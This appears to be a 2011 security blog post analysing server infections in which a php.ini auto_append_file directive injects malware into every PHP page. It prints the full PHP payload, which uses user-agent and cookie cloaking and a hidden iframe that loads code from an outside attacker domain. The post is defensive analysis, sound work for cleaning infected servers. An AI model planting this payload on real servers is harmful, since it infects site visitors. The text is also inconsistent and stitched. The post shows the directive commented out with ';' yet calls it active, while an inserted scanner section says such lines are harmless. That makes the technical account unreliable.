Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware Being Called From Your php.ini File

December 22, 2011, by David Dede

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = "0ff"

This simple line in the php.ini makes PHP run the file 0ff (/tmp/0ff) after every PHP script on the server and append its output to the response. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

<?php
// Cloaking: the payload is only served to visitors who do not yet have the marker
// cookie and whose User-Agent does not match search-engine bots or the listed
// platforms/browsers (mostly non-Windows clients).
if(!@isset($_COOKIE['PHPSESS1D']) &&
 !@preg_match('/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|Mac OS|Opera Mini|Chrome|Apple/i', $_SERVER['HTTP_USER_AGENT'])) {
 // Set the marker cookie for one day so the same visitor is not served the iframe twice
 echo '<script type="text/javascript">
 d=new Date();
 d.setDate(d.getDate()+1);
 document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
 </script>';
 // Hidden 10x10 iframe that loads the remote payload
 echo '<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>';
}

So if you are seeing those hidden iframes but cannot find them in your files, look at your PHP and main Apache configurations.
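The check described above, as an added example that is not part of the original post or of Sucuri's tooling: a POSIX shell scanner that lists every auto_prepend_file / auto_append_file directive in php.ini, conf.d snippets, .user.ini, .htaccess and *.conf files under the given directories. Because php.ini treats a line starting with ";" as a comment, such lines are reported as COMMENTED and only uncommented ones as ACTIVE. The fixture function builds constructed sample files in a temp directory; paths and file names are assumptions.

```shell
#!/bin/sh
# Added example (not Sucuri's code): find auto_prepend_file/auto_append_file
# directives that would inject a foreign file into every PHP response.

scan_ini_file() {
    # $1 = config file. Prints "ACTIVE file:line: text" or "COMMENTED file:line: text".
    grep -n -i -E 'auto_(prepend|append)_file' "$1" 2>/dev/null |
    while IFS= read -r hit; do
        num=${hit%%:*}
        text=$(printf '%s' "${hit#*:}" | sed 's/^[[:space:]]*//')
        case "$text" in
            ';'*|'#'*) printf 'COMMENTED %s:%s: %s\n' "$1" "$num" "$text" ;;  # php.ini/.htaccess comment
            *)         printf 'ACTIVE %s:%s: %s\n' "$1" "$num" "$text" ;;
        esac
    done
}

scan_ini_dirs() {
    # $@ = directories to walk, e.g. /etc/php /etc/apache2 /var/www
    find "$@" -type f \( -name '*.ini' -o -name '.htaccess' -o -name '*.conf' \) 2>/dev/null |
    while IFS= read -r f; do scan_ini_file "$f"; done
}

count_active() {
    # Number of uncommented directives across the given directories
    scan_ini_dirs "$@" | grep -c '^ACTIVE' || true
}

make_fixture() {
    # Constructed sample configs: the directive commented out in php.ini (harmless),
    # active in a conf.d snippet (the form from the post) and active in an .htaccess.
    dir=$(mktemp -d)
    mkdir -p "$dir/conf.d"
    printf 'memory_limit = 128M\n;auto_append_file = "0ff"\n' > "$dir/php.ini"
    printf 'include_path = ".:/tmp"\nauto_append_file = "0ff"\n' > "$dir/conf.d/99-zz.ini"
    printf 'php_value auto_prepend_file /tmp/0ff\n' > "$dir/.htaccess"
    printf '%s' "$dir"
}

if [ "$#" -gt 0 ]; then
    scan_ini_dirs "$@"
fi
```

Pair this with `php -i | grep -i auto_` to see the values PHP actually loaded, since a directive can also come from a file the scanner was not pointed at.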


Categories: Vulnerability Disclosure, Website Malware Infections. Tags: Hacked Websites, Malware Updates.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Shosha

    December 25, 2011

    Yeah lol, a “vulnerability” that is a legitimate and documented directive of PHP… If you leave your php.ini unprotected, it’s really your own fault, not PHP’s…

  2. Anonymous

    December 27, 2011

    Anyway it’s a bad idea, most distros around empty /tmp at boot by default. It will get deleted just by rebooting.

  3. SomeGuy

    December 28, 2011

    How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?

